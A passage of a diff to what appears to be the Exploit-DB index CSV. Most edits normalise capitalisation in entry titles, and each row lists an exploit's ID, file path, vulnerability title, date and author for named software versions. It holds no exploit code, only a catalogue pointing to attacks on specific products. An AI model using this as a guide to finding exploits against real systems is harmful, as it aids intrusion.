Marketing 1.0 - Arbitrary File Upload",2015-03-24,KedAns-Dz,php,webapps,0 +36478,platforms/php/webapps/36478.php,"WordPress Plugin InBoundio Marketing 1.0 - Arbitrary File Upload",2015-03-24,KedAns-Dz,php,webapps,0 36506,platforms/php/webapps/36506.txt,"pfSense 2.2 - Multiple Vulnerabilities",2015-03-26,"High-Tech Bridge SA",php,webapps,0 -36487,platforms/php/webapps/36487.txt,"Wordpress Comment Rating Plugin 2.9.20 - 'path' Parameter Cross-Site Scripting",2012-01-03,"The Evil Thinker",php,webapps,0 -36488,platforms/php/webapps/36488.txt,"Wordpress WHOIS Plugin 1.4.2 3 - 'domain' Parameter Cross-Site Scripting",2012-01-03,Atmon3r,php,webapps,0 +36487,platforms/php/webapps/36487.txt,"WordPress Comment Rating Plugin 2.9.20 - 'path' Parameter Cross-Site Scripting",2012-01-03,"The Evil Thinker",php,webapps,0 +36488,platforms/php/webapps/36488.txt,"WordPress WHOIS Plugin 1.4.2 3 - 'domain' Parameter Cross-Site Scripting",2012-01-03,Atmon3r,php,webapps,0 36489,platforms/php/webapps/36489.txt,"TextPattern 4.4.1 - 'ddb' Parameter Cross-Site Scripting",2012-01-04,"Jonathan Claudius",php,webapps,0 36490,platforms/php/webapps/36490.py,"WP Marketplace 2.4.0 - Remote Code Execution (Add WP Admin)",2015-03-25,"Claudio Viviani",php,webapps,0 36491,platforms/windows/remote/36491.txt,"Adobe Flash Player - Arbitrary Code Execution",2015-03-25,SecurityObscurity,windows,remote,0 -36492,platforms/php/webapps/36492.txt,"GraphicsClone Script - 'term' parameter Cross-Site Scripting",2012-01-04,Mr.PaPaRoSSe,php,webapps,0 -36493,platforms/php/webapps/36493.txt,"Orchard 1.3.9 - 'ReturnUrl' Parameter URI Redirection",2012-01-04,"Mesut Timur",php,webapps,0 +36492,platforms/php/webapps/36492.txt,"GraphicsClone Script - 'term' Parameter Cross-Site Scripting",2012-01-04,Mr.PaPaRoSSe,php,webapps,0 +36493,platforms/php/webapps/36493.txt,"Orchard 1.3.9 - 'ReturnUrl' Parameter URI redirection",2012-01-04,"Mesut Timur",php,webapps,0 36494,platforms/php/webapps/36494.txt,"Limny 3.0.1 - 'login.php' Script Cross-Site Scripting",2012-01-04,"Gjoko Krstic",php,webapps,0 36495,platforms/php/webapps/36495.txt,"Pligg CMS 1.1.2 - 'status' Parameter SQL Injection",2011-12-29,SiteWatch,php,webapps,0 36496,platforms/php/webapps/36496.txt,"Pligg CMS 1.1.4 - 'SERVER[php_self]' Cross-Site Scripting",2011-12-29,SiteWatch,php,webapps,0 -36497,platforms/php/webapps/36497.txt,"UBB.threads 7.5.6 - 'Username' Field Cross-Site Scripting",2012-01-04,sonyy,php,webapps,0 +36497,platforms/php/webapps/36497.txt,"UBB.Threads 7.5.6 - 'Username' Field Cross-Site Scripting",2012-01-04,sonyy,php,webapps,0 36498,platforms/php/webapps/36498.txt,"Yaws 1.88 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-01-05,SiteWatch,php,webapps,0 36499,platforms/php/webapps/36499.txt,"StatIt 4 - 'statistik.php' Multiple Cross-Site Scripting Vulnerabilities",2012-01-04,sonyy,php,webapps,0 36500,platforms/windows/remote/36500.txt,"HServer 0.1.1 - Directory Traversal",2012-01-05,demonalex,windows,remote,0 @@ -32943,29 +32946,29 @@ id,file,description,date,author,platform,type,port 36521,platforms/php/webapps/36521.txt,"Atar2b CMS 4.0.1 - gallery_e.php id Parameter SQL Injection",2012-01-07,"BHG Security Center",php,webapps,0 36522,platforms/php/webapps/36522.txt,"Atar2b CMS 4.0.1 - pageH.php id Parameter SQL Injection",2012-01-07,"BHG Security Center",php,webapps,0 36523,platforms/php/webapps/36523.txt,"Atar2b CMS 4.0.1 - pageE.php id Parameter SQL Injection",2012-01-07,"BHG Security Center",php,webapps,0 -36524,platforms/php/webapps/36524.txt,"ClipBucket 2.6 - channels.php cat Parameter Cross-Site Scripting",2012-01-09,YaDoY666,php,webapps,0 -36525,platforms/php/webapps/36525.txt,"ClipBucket 2.6 - collections.php cat Parameter Cross-Site Scripting",2012-01-09,YaDoY666,php,webapps,0 -36526,platforms/php/webapps/36526.txt,"ClipBucket 2.6 - groups.php cat Parameter Cross-Site Scripting",2012-01-09,YaDoY666,php,webapps,0 -36527,platforms/php/webapps/36527.txt,"ClipBucket 2.6 - search_result.php query Parameter Cross-Site Scripting",2012-01-09,YaDoY666,php,webapps,0 -36528,platforms/php/webapps/36528.txt,"ClipBucket 2.6 - videos.php cat Parameter Cross-Site Scripting",2012-01-09,YaDoY666,php,webapps,0 -36529,platforms/php/webapps/36529.txt,"ClipBucket 2.6 - view_collection.php type Parameter Cross-Site Scripting",2012-01-09,YaDoY666,php,webapps,0 -36530,platforms/php/webapps/36530.txt,"ClipBucket 2.6 - view_item.php type Parameter Cross-Site Scripting",2012-01-09,YaDoY666,php,webapps,0 -36531,platforms/php/webapps/36531.txt,"ClipBucket 2.6 - videos.php time Parameter SQL Injection",2012-01-09,YaDoY666,php,webapps,0 -36532,platforms/php/webapps/36532.txt,"ClipBucket 2.6 - channels.php time Parameter SQL Injection",2012-01-09,YaDoY666,php,webapps,0 +36524,platforms/php/webapps/36524.txt,"Clipbucket 2.6 - channels.php cat Parameter Cross-Site Scripting",2012-01-09,YaDoY666,php,webapps,0 +36525,platforms/php/webapps/36525.txt,"Clipbucket 2.6 - collections.php cat Parameter Cross-Site Scripting",2012-01-09,YaDoY666,php,webapps,0 +36526,platforms/php/webapps/36526.txt,"Clipbucket 2.6 - groups.php cat Parameter Cross-Site Scripting",2012-01-09,YaDoY666,php,webapps,0 +36527,platforms/php/webapps/36527.txt,"Clipbucket 2.6 - search_result.php query Parameter Cross-Site Scripting",2012-01-09,YaDoY666,php,webapps,0 +36528,platforms/php/webapps/36528.txt,"Clipbucket 2.6 - videos.php cat Parameter Cross-Site Scripting",2012-01-09,YaDoY666,php,webapps,0 +36529,platforms/php/webapps/36529.txt,"Clipbucket 2.6 - view_collection.php type Parameter Cross-Site Scripting",2012-01-09,YaDoY666,php,webapps,0 +36530,platforms/php/webapps/36530.txt,"Clipbucket 2.6 - view_item.php type Parameter Cross-Site Scripting",2012-01-09,YaDoY666,php,webapps,0 +36531,platforms/php/webapps/36531.txt,"Clipbucket 2.6 - videos.php time Parameter SQL Injection",2012-01-09,YaDoY666,php,webapps,0 +36532,platforms/php/webapps/36532.txt,"Clipbucket 2.6 - channels.php time Parameter SQL Injection",2012-01-09,YaDoY666,php,webapps,0 36533,platforms/windows/local/36533.py,"IDM 6.20 - Local Buffer Overflow",2015-03-28,"TUNISIAN CYBER",windows,local,0 36534,platforms/php/webapps/36534.txt,"MARINET CMS - room2.php roomid Parameter SQL Injection",2012-01-09,"H4ckCity Security Team",php,webapps,0 36535,platforms/php/webapps/36535.txt,"MARINET CMS - galleryphoto.php id Parameter SQL Injection",2012-01-09,"H4ckCity Security Team",php,webapps,0 36536,platforms/php/webapps/36536.txt,"MARINET CMS - gallery.php id Parameter SQL Injection",2012-01-09,"H4ckCity Security Team",php,webapps,0 -36537,platforms/multiple/remote/36537.txt,"SonicWALL AntiSpam & EMail 7.3.1 - Multiple Security vulnerabilities",2012-01-10,"Benjamin Kunz Mejri",multiple,remote,0 +36537,platforms/multiple/remote/36537.txt,"SonicWALL AntiSpam & EMail 7.3.1 - Multiple Security Vulnerabilities",2012-01-10,"Benjamin Kunz Mejri",multiple,remote,0 36538,platforms/php/webapps/36538.txt,"Gregarius 0.6.1 - Multiple SQL Injections / Cross-Site Scripting",2012-01-09,sonyy,php,webapps,0 36539,platforms/php/webapps/36539.txt,"Advanced File Management 1.4 - 'users.php' Cross-Site Scripting",2012-01-09,Am!r,php,webapps,0 -36540,platforms/php/webapps/36540.txt,"Wordpress Age Verification plugin 0.4 - 'redirect_to' Parameter URI Redirection",2012-01-10,"Gianluca Brindisi",php,webapps,0 +36540,platforms/php/webapps/36540.txt,"WordPress Age Verification plugin 0.4 - 'redirect_to' Parameter URI redirection",2012-01-10,"Gianluca Brindisi",php,webapps,0 36541,platforms/php/webapps/36541.txt,"PHP-Fusion 7.2.4 - 'downloads.php' Cross-Site Scripting",2012-01-10,Am!r,php,webapps,0 36542,platforms/windows/remote/36542.txt,"ExpressView Browser Plugin 6.5.0.3330 - Multiple Integer Overflow / Remote Code Execution Vulnerabilities",2012-01-11,"Luigi Auriemma",windows,remote,0 36543,platforms/php/webapps/36543.txt,"KnowledgeTree 3.x - Multiple Cross-Site Scripting Vulnerabilities",2012-01-11,"High-Tech Bridge SA",php,webapps,0 36544,platforms/php/webapps/36544.txt,"Kayako SupportSuite 3.x - Multiple Vulnerabilities",2012-01-11,"Yuri Goltsev",php,webapps,0 36545,platforms/linux/dos/36545.txt,"Linux Kernel 3.1.8 - KVM Local Denial of Service",2011-12-29,"Stephan Sattler",linux,dos,0 -36546,platforms/windows/remote/36546.txt,"GreenBrowser 6.0.1002 - Search Bar Short Cut Button Double Free Remote Memory Corruption",2012-01-12,NCNIPC,windows,remote,0 +36546,platforms/windows/remote/36546.txt,"GreenBrowser 6.0.1002 - Search Bar Short Cut Button Double-Free Remote Memory Corruption",2012-01-12,NCNIPC,windows,remote,0 36547,platforms/asp/webapps/36547.txt,"MailEnable 6.02 - 'ForgottonPassword.aspx' Cross-Site Scripting",2012-01-12,"Sajjad Pourali",asp,webapps,0 36548,platforms/java/webapps/36548.txt,"Contus Job Portal - 'Category' Parameter SQL Injection",2012-01-13,Lazmania61,java,webapps,0 36549,platforms/php/webapps/36549.txt,"Joomla! HD Video Share Component 1.3 - 'id' Parameter SQL Injection",2012-01-12,Lazmania61,php,webapps,0 @@ -32973,9 +32976,9 @@ id,file,description,date,author,platform,type,port 36551,platforms/php/webapps/36551.txt,"PHP Ringtone Website - 'ringtones.php' Multiple Cross-Site Scripting Vulnerabilities",2012-01-15,Atmon3r,php,webapps,0 36552,platforms/php/webapps/36552.txt,"BoltWire 3.4.16 - Multiple 'index.php' Cross-Site Scripting Vulnerabilities",2012-01-16,"Stefan Schurtz",php,webapps,0 36553,platforms/java/webapps/36553.java,"JBoss JMXInvokerServlet JMXInvoker 0.3 - Remote Command Execution",2015-03-30,ikki,java,webapps,0 -36554,platforms/php/webapps/36554.txt,"Wordpress Plugin Slider Revolution 4.1.4 - Arbitrary File Download",2015-03-30,"Claudio Viviani",php,webapps,0 +36554,platforms/php/webapps/36554.txt,"WordPress Plugin Slider REvolution 4.1.4 - Arbitrary File Download",2015-03-30,"Claudio Viviani",php,webapps,0 36747,platforms/linux/local/36747.c,"abrt (Fedora 21) - Race Condition Exploit",2015-04-14,"Tavis Ormandy",linux,local,0 -36559,platforms/php/webapps/36559.txt,"Wordpress aspose-doc-exporter Plugin 1.0 - Arbitrary File Download",2015-03-30,ACC3SS,php,webapps,0 +36559,platforms/php/webapps/36559.txt,"WordPress aspose-doc-exporter Plugin 1.0 - Arbitrary File Download",2015-03-30,ACC3SS,php,webapps,0 36560,platforms/php/webapps/36560.txt,"Joomla Gallery WD Component - SQL Injection",2015-03-30,CrashBandicot,php,webapps,0 36561,platforms/php/webapps/36561.txt,"Joomla Contact Form Maker 1.0.1 Component - SQL Injection",2015-03-30,"TUNISIAN CYBER",php,webapps,0 36562,platforms/linux/remote/36562.txt,"Apache Spark Cluster 1.3.x - Arbitrary Code Execution",2015-03-30,"Akhil Das",linux,remote,0 @@ -32991,9 +32994,9 @@ id,file,description,date,author,platform,type,port 36573,platforms/php/webapps/36573.txt,"MMORPG Zone - 'view_news.php' SQL Injection",2012-01-18,Lazmania61,php,webapps,0 36574,platforms/php/webapps/36574.txt,"Freelance Zone - 'show_code.php' SQL Injection",2012-01-18,Lazmania61,php,webapps,0 36575,platforms/multiple/webapps/36575.py,"JBoss AS 3/4/5/6 - Remote Command Execution",2015-03-31,"João Filho Matos Figueiredo",multiple,webapps,0 -36576,platforms/php/webapps/36576.txt,"Wordpress SP Project & Document Manager 2.5.3 Plugin - Blind SQL Injection",2015-03-31,Catsecurity,php,webapps,0 +36576,platforms/php/webapps/36576.txt,"WordPress SP Project & Document Manager 2.5.3 Plugin - Blind SQL Injection",2015-03-31,Catsecurity,php,webapps,0 36577,platforms/multiple/remote/36577.py,"Airties Air5650TT - Remote Stack Overflow",2015-03-31,"Batuhan Burakcin",multiple,remote,0 -36739,platforms/osx/local/36739.m,"Apple MAC OSX < 10.9/10 - Privilege Escalation",2015-04-13,mu-b,osx,local,0 +36739,platforms/osx/local/36739.m,"Apple Mac OS X < 10.9/10 - Privilege Escalation",2015-04-13,mu-b,osx,local,0 36579,platforms/windows/remote/36579.rb,"Adobe Flash Player - ByteArray With Workers Use-After-Free",2015-03-31,Metasploit,windows,remote,0 36580,platforms/windows/webapps/36580.rb,"Palo Alto Traps Server 3.1.2.1546 - Persistent Cross-Site Scripting",2015-03-31,"Michael Hendrickx",windows,webapps,0 36581,platforms/php/webapps/36581.txt,"Fiyo CMS 2.0.1.8 - Multiple Vulnerabilities",2015-03-31,Mahendra,php,webapps,80 @@ -33004,34 +33007,34 @@ id,file,description,date,author,platform,type,port 36586,platforms/php/webapps/36586.txt,"Syneto Unified Threat Management 1.3.3/1.4.2 - Multiple Cross-Site Scripting / HTML Injection Vulnerabilities",2012-01-20,"Alexander Fuchs",php,webapps,0 36587,platforms/windows/remote/36587.py,"Savant Web Server 3.1 - Remote Buffer Overflow (4)",2012-01-21,red-dragon,windows,remote,0 36588,platforms/asp/webapps/36588.txt,"Acidcat ASP CMS 3.5 - Multiple Cross-Site Scripting Vulnerabilities",2012-01-21,"Avram Marius",asp,webapps,0 -36589,platforms/php/webapps/36589.txt,"Joomla! 'com_br' Component - 'controller' Parameter Local File Inclusion",2012-01-23,the_cyber_nuxbie,php,webapps,0 +36589,platforms/php/webapps/36589.txt,"Joomla! 'com_br' Component - 'Controller' Parameter Local File Inclusion",2012-01-23,the_cyber_nuxbie,php,webapps,0 36590,platforms/php/webapps/36590.txt,"Tribiq CMS - 'index.php' SQL Injection",2012-01-21,"Skote Vahshat",php,webapps,0 36591,platforms/php/webapps/36591.txt,"Joomla! Full 'com_full' Component - 'id' Parameter SQL Injection",2012-01-21,the_cyber_nuxbie,php,webapps,0 36592,platforms/php/webapps/36592.txt,"Joomla 'com_sanpham' Component - Multiple SQL Injections",2012-01-21,the_cyber_nuxbie,php,webapps,0 36593,platforms/php/webapps/36593.txt,"Joomla! 'com_xball' Component - 'team_id' Parameter SQL Injection",2012-01-23,CoBRa_21,php,webapps,0 -36594,platforms/php/webapps/36594.txt,"Joomla! 'com_boss' Component - 'controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0 +36594,platforms/php/webapps/36594.txt,"Joomla! 'com_boss' Component - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0 36595,platforms/php/webapps/36595.txt,"Joomla 'com_car' Component - Multiple SQL Injections",2012-01-21,the_cyber_nuxbie,php,webapps,0 -36596,platforms/php/webapps/36596.txt,"Joomla! 'com_some' Component - 'controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0 -36597,platforms/php/webapps/36597.txt,"Joomla! 'com_bulkenquery' Component - 'controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0 -36598,platforms/php/webapps/36598.txt,"Joomla! 'com_kp' Component - 'controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0 +36596,platforms/php/webapps/36596.txt,"Joomla! 'com_some' Component - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0 +36597,platforms/php/webapps/36597.txt,"Joomla! 'com_bulkenquery' Component - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0 +36598,platforms/php/webapps/36598.txt,"Joomla! 'com_kp' Component - 'Controller' Parameter Local File Inclusion",2012-01-21,the_cyber_nuxbie,php,webapps,0 36599,platforms/asp/webapps/36599.txt,"Raven 1.0 - 'connector.asp' Arbitrary File Upload",2012-01-21,HELLBOY,asp,webapps,0 -36600,platforms/php/webapps/36600.txt,"Wordpress Business Intelligence Plugin - SQL Injection (Metasploit)",2015-04-02,"Jagriti Sahu",php,webapps,80 +36600,platforms/php/webapps/36600.txt,"WordPress Business Intelligence Plugin - SQL Injection (Metasploit)",2015-04-02,"Jagriti Sahu",php,webapps,80 36601,platforms/php/webapps/36601.txt,"Joomla Spider Random Article Component - SQL Injection",2015-04-02,"Jagriti Sahu",php,webapps,80 -36620,platforms/php/webapps/36620.txt,"Wordpress YouSayToo auto-publishing Plugin 1.0 - 'submit' Parameter Cross-Site Scripting",2012-01-24,"H4ckCity Security Team",php,webapps,0 +36620,platforms/php/webapps/36620.txt,"WordPress YouSayToo auto-publishing Plugin 1.0 - 'submit' Parameter Cross-Site Scripting",2012-01-24,"H4ckCity Security Team",php,webapps,0 36602,platforms/windows/remote/36602.html,"Webgate WESP SDK 1.2 - ChangePassword Stack Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0 36603,platforms/windows/remote/36603.html,"WebGate eDVR Manager 2.6.4 - AudioOnlySiteChannel Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0 36604,platforms/windows/remote/36604.html,"WebGate WinRDS 2.0.8 - PlaySiteAllChannel Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0 36606,platforms/windows/remote/36606.html,"WebGate eDVR Manager 2.6.4 - SiteChannel Property Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0 36607,platforms/windows/remote/36607.html,"WebGate eDVR Manager 2.6.4 - Connect Method Stack Buffer Overflow",2015-04-02,"Praveen Darshanam",windows,remote,0 36609,platforms/multiple/webapps/36609.txt,"Kemp Load Master 7.1.16 - Multiple Vulnerabilities",2015-04-02,"Roberto Suggi Liverani",multiple,webapps,80 -36610,platforms/php/webapps/36610.txt,"Wordpress Video Gallery Plugin 2.8 - Multiple Cross-Site Request Forgery Vulnerabilities",2015-04-02,Divya,php,webapps,80 -36611,platforms/php/webapps/36611.txt,"Multiple UpThemes Wordpress Themes - Arbitrary File Upload",2015-04-02,Divya,php,webapps,80 -36612,platforms/php/webapps/36612.txt,"Wordpress WP Easy Slideshow Plugin 1.0.3 - Multiple Vulnerabilities",2015-04-02,Divya,php,webapps,80 -36613,platforms/php/webapps/36613.txt,"Wordpress Simple Ads Manager Plugin - Multiple SQL Injections",2015-04-02,"ITAS Team",php,webapps,80 -36614,platforms/php/webapps/36614.txt,"Wordpress Simple Ads Manager 2.5.94 Plugin - Arbitrary File Upload",2015-04-02,"ITAS Team",php,webapps,80 -36615,platforms/php/webapps/36615.txt,"Wordpress Simple Ads Manager Plugin - Information Disclosure",2015-04-02,"ITAS Team",php,webapps,80 +36610,platforms/php/webapps/36610.txt,"WordPress Video Gallery Plugin 2.8 - Multiple Cross-Site Request Forgery Vulnerabilities",2015-04-02,Divya,php,webapps,80 +36611,platforms/php/webapps/36611.txt,"Multiple UpThemes WordPress Themes - Arbitrary File Upload",2015-04-02,Divya,php,webapps,80 +36612,platforms/php/webapps/36612.txt,"WordPress WP Easy Slideshow Plugin 1.0.3 - Multiple Vulnerabilities",2015-04-02,Divya,php,webapps,80 +36613,platforms/php/webapps/36613.txt,"WordPress Simple Ads Manager Plugin - Multiple SQL Injections",2015-04-02,"ITAS Team",php,webapps,80 +36614,platforms/php/webapps/36614.txt,"WordPress Simple Ads Manager 2.5.94 Plugin - Arbitrary File Upload",2015-04-02,"ITAS Team",php,webapps,80 +36615,platforms/php/webapps/36615.txt,"WordPress Simple Ads Manager Plugin - Information Disclosure",2015-04-02,"ITAS Team",php,webapps,80 36616,platforms/php/webapps/36616.txt,"phpSFP - Schedule Facebook Posts 1.5.6 SQL Injection",2015-04-02,@u0x,php,webapps,80 -36617,platforms/php/webapps/36617.txt,"Wordpress VideoWhisper Video Presentation 3.31.17 Plugin - Remote File Upload",2015-04-02,"Larry W. Cashdollar",php,webapps,80 +36617,platforms/php/webapps/36617.txt,"WordPress VideoWhisper Video Presentation 3.31.17 Plugin - Remote File Upload",2015-04-02,"Larry W. Cashdollar",php,webapps,80 36618,platforms/php/webapps/36618.txt,"VideoWhisper Video Conference Integration 4.91.8 - Remote File Upload",2015-04-02,"Larry W. Cashdollar",php,webapps,80 36619,platforms/linux/webapps/36619.txt,"Ericsson Drutt MSDP (Instance Monitor) - Directory Traversal",2015-04-02,"Anastasios Monachos",linux,webapps,0 36621,platforms/php/webapps/36621.txt,"glFusion 1.x - SQL Injection",2012-01-24,KedAns-Dz,php,webapps,0 @@ -33044,7 +33047,7 @@ id,file,description,date,author,platform,type,port 36628,platforms/php/webapps/36628.txt,"vBadvanced CMPS 3.2.2 - 'vba_cmps_include_bottom.php' Remote File Inclusion",2012-01-25,PacketiK,php,webapps,0 36629,platforms/php/webapps/36629.txt,"Joomla! 'com_motor' Component - 'cid' Parameter SQL Injection",2012-01-26,the_cyber_nuxbie,php,webapps,0 36630,platforms/php/webapps/36630.txt,"Joomla 'com_products' Component - Multiple SQL Injections",2012-01-26,the_cyber_nuxbie,php,webapps,0 -36631,platforms/php/webapps/36631.txt,"Wordpress Slideshow Gallery Plugin 1.1.x - 'border' Parameter Cross-Site Scripting",2012-01-26,"Bret Hawk",php,webapps,0 +36631,platforms/php/webapps/36631.txt,"WordPress Slideshow Gallery Plugin 1.1.x - 'border' Parameter Cross-Site Scripting",2012-01-26,"Bret Hawk",php,webapps,0 36632,platforms/php/webapps/36632.txt,"xClick Cart 1.0.x - 'shopping_url' Parameter Cross-Site Scripting",2012-01-26,sonyy,php,webapps,0 36633,platforms/linux/dos/36633.txt,"Wireshark - Buffer Underflow / Denial of Service",2012-01-10,"Laurent Butti",linux,dos,0 36634,platforms/php/webapps/36634.txt,"Joomla! 'com_visa' Component - Local File Inclusion / SQL Injection",2012-01-28,the_cyber_nuxbie,php,webapps,0 @@ -33052,7 +33055,7 @@ id,file,description,date,author,platform,type,port 36637,platforms/lin_x86/shellcode/36637.c,"Linux/x86 - Disable ASLR Shellcode (84 bytes)",2015-04-03,"Mohammad Reza Ramezani",lin_x86,shellcode,0 36638,platforms/php/webapps/36638.txt,"Joomla! 'com_crhotels' Component - 'catid' Parameter SQL Injection",2012-01-31,the_cyber_nuxbie,php,webapps,0 36639,platforms/php/webapps/36639.txt,"Joomla! 'com_propertylab' Component - 'id' Parameter SQL Injection",2012-01-30,the_cyber_nuxbie,php,webapps,0 -36640,platforms/php/webapps/36640.txt,"Wordpress Work The Flow File Upload 2.5.2 Plugin - Arbitrary File Upload",2015-04-05,"Claudio Viviani",php,webapps,0 +36640,platforms/php/webapps/36640.txt,"WordPress Work The Flow File Upload 2.5.2 Plugin - Arbitrary File Upload",2015-04-05,"Claudio Viviani",php,webapps,0 36641,platforms/php/webapps/36641.txt,"u-Auctions - Multiple Vulnerabilities",2015-04-05,*Don*,php,webapps,0 36642,platforms/php/webapps/36642.txt,"Joomla! 'com_bbs' Component - Multiple SQL Injections",2012-01-30,the_cyber_nuxbie,php,webapps,0 36643,platforms/php/webapps/36643.txt,"4Images 1.7.10 - admin/categories.php cat_parent_id Parameter SQL Injection",2012-01-31,RandomStorm,php,webapps,0 @@ -33060,10 +33063,10 @@ id,file,description,date,author,platform,type,port 36645,platforms/php/webapps/36645.txt,"4Images 1.7.10 - admin/index.php redirect Parameter Arbitrary Site Redirect",2012-01-31,RandomStorm,php,webapps,0 36646,platforms/php/webapps/36646.txt,"Joomla! 'com_cmotour' Component - 'id' Parameter SQL Injection",2012-01-28,the_cyber_nuxbie,php,webapps,0 36647,platforms/php/webapps/36647.txt,"Lead Capture - 'login.php' Script Cross-Site Scripting",2012-01-21,HashoR,php,webapps,0 -36648,platforms/php/webapps/36648.txt,"OpenEMR 4.1 - interface/patient_file/encounter/trend_form.php formname Parameter Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0 -36649,platforms/php/webapps/36649.txt,"OpenEMR 4.1 - interface/patient_file/encounter/load_form.php formname Parameter Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0 +36648,platforms/php/webapps/36648.txt,"OpenEMR 4.1 - Interface/patient_file/encounter/trend_form.php formname Parameter Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0 +36649,platforms/php/webapps/36649.txt,"OpenEMR 4.1 - Interface/patient_file/encounter/load_form.php formname Parameter Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0 36650,platforms/php/webapps/36650.txt,"OpenEMR 4.1 - contrib/acog/print_form.php formname Parameter Traversal Local File Inclusion",2012-02-01,"High-Tech Bridge SA",php,webapps,0 -36651,platforms/php/webapps/36651.txt,"OpenEMR 4.1 - interface/fax/fax_dispatch.php file Parameter exec() Call Arbitrary Shell Command Execution",2012-02-01,"High-Tech Bridge SA",php,webapps,0 +36651,platforms/php/webapps/36651.txt,"OpenEMR 4.1 - Interface/fax/fax_dispatch.php file Parameter exec() Call Arbitrary Shell Command Execution",2012-02-01,"High-Tech Bridge SA",php,webapps,0 36652,platforms/multiple/remote/36652.py,"w3tw0rk / Pitbull Perl IRC Bot - Remote Code Execution (PoC)",2015-04-06,"Jay Turla",multiple,remote,6667 36653,platforms/jsp/remote/36653.rb,"JBoss Seam 2 - File Upload and Execute",2015-04-06,Metasploit,jsp,remote,8080 36654,platforms/php/webapps/36654.txt,"phpLDAPadmin 1.2.2 - 'base' Parameter Cross-Site Scripting",2012-02-01,andsarmiento,php,webapps,0 @@ -33078,20 +33081,20 @@ id,file,description,date,author,platform,type,port 36663,platforms/linux/remote/36663.txt,"Apache HTTP Server 2.2.15 - 'mod_proxy' Reverse Proxy Security Bypass",2012-02-06,"Tomas Hoger",linux,remote,0 36664,platforms/php/webapps/36664.txt,"Vespa 0.8.6 - 'getid3.php' Local File Inclusion",2012-02-06,T0x!c,php,webapps,0 36665,platforms/php/webapps/36665.txt,"Simple Groupware 0.742 - 'export' Parameter Cross-Site Scripting",2012-02-07,"Infoserve Security Team",php,webapps,0 -36666,platforms/java/webapps/36666.txt,"ManageEngine ADManager Plus 5.2 Build 5210 - DomainConfig.do operation Parameter Cross-Site Scripting",2012-02-07,LiquidWorm,java,webapps,0 +36666,platforms/java/webapps/36666.txt,"ManageEngine ADManager Plus 5.2 Build 5210 - DomainConfig.do Operation Parameter Cross-Site Scripting",2012-02-07,LiquidWorm,java,webapps,0 36667,platforms/java/webapps/36667.txt,"ManageEngine ADManager Plus 5.2 Build 5210 - jsp/AddDC.jsp domainName Parameter Cross-Site Scripting",2012-02-07,LiquidWorm,java,webapps,0 36668,platforms/php/webapps/36668.txt,"eFront 3.6.10 - 'administrator.php' Cross-Site Scripting",2012-02-07,"Chokri B.A",php,webapps,0 36669,platforms/linux/dos/36669.txt,"Apache APR - Hash Collision Denial Of Service",2012-01-05,"Moritz Muehlenhoff",linux,dos,0 36670,platforms/hardware/remote/36670.txt,"D-Link ShareCenter Products - Multiple Remote Code Execution Vulnerabilities",2012-02-08,"Roberto Paleari",hardware,remote,0 -36671,platforms/php/webapps/36671.txt,"Wordpress All In One WP Security & Firewall 3.9.0 Plugin - SQL Injection",2015-04-08,"Claudio Viviani",php,webapps,80 +36671,platforms/php/webapps/36671.txt,"WordPress All In One WP Security & Firewall 3.9.0 Plugin - SQL Injection",2015-04-08,"Claudio Viviani",php,webapps,80 36672,platforms/lin_x86/shellcode/36672.asm,"Linux/x86 - Egg-hunter Shellcode (20 bytes)",2015-04-08,"Paw Petersen",lin_x86,shellcode,0 36673,platforms/lin_x86/shellcode/36673.py,"Linux/x86 - Typewriter Shellcode (Generator)",2015-04-08,"Paw Petersen",lin_x86,shellcode,0 36674,platforms/php/webapps/36674.txt,"Shareaholic 7.6.0.3 - Cross-Site Scripting",2015-04-08,"Kacper Szurek",php,webapps,80 36675,platforms/php/webapps/36675.txt,"Balero CMS 0.7.2 - Multiple Blind SQL Injection",2015-04-08,LiquidWorm,php,webapps,80 36676,platforms/php/webapps/36676.html,"Balero CMS 0.7.2 - Multiple JS/HTML Injection Vulnerabilities",2015-04-08,LiquidWorm,php,webapps,80 -36677,platforms/php/webapps/36677.txt,"Wordpress Traffic Analyzer Plugin 3.4.2 - Blind SQL Injection",2015-04-08,"Dan King",php,webapps,80 +36677,platforms/php/webapps/36677.txt,"WordPress Traffic Analyzer Plugin 3.4.2 - Blind SQL Injection",2015-04-08,"Dan King",php,webapps,80 36678,platforms/jsp/webapps/36678.txt,"ZENworks Configuration Management 11.3.1 - Remote Code Execution",2015-04-08,"Pedro Ribeiro",jsp,webapps,0 -36679,platforms/windows/remote/36679.rb,"Solarwinds Firewall Security Manager 6.6.5 - Client Session Handling",2015-04-08,Metasploit,windows,remote,0 +36679,platforms/windows/remote/36679.rb,"SolarWinds Firewall Security Manager 6.6.5 - Client Session Handling",2015-04-08,Metasploit,windows,remote,0 36680,platforms/hardware/remote/36680.txt,"Multiple Trendnet Camera Products - Remote Security Bypass",2012-02-10,console-cowboys,hardware,remote,0 36681,platforms/multiple/remote/36681.txt,"Apache MyFaces - 'ln' Parameter Information Disclosure",2012-02-09,"Paul Nicolucci",multiple,remote,0 36682,platforms/php/dos/36682.php,"PHP PDORow Object - Remote Denial Of Service",2011-09-24,anonymous,php,dos,0 @@ -33102,72 +33105,72 @@ id,file,description,date,author,platform,type,port 36687,platforms/php/webapps/36687.txt,"CubeCart 3.0.20 - switch.php r Parameter Arbitrary Site Redirect",2012-02-10,"Aung Khant",php,webapps,0 36688,platforms/php/webapps/36688.html,"Zen Cart 1.3.9h - 'path_to_admin/product.php' Cross-Site Request 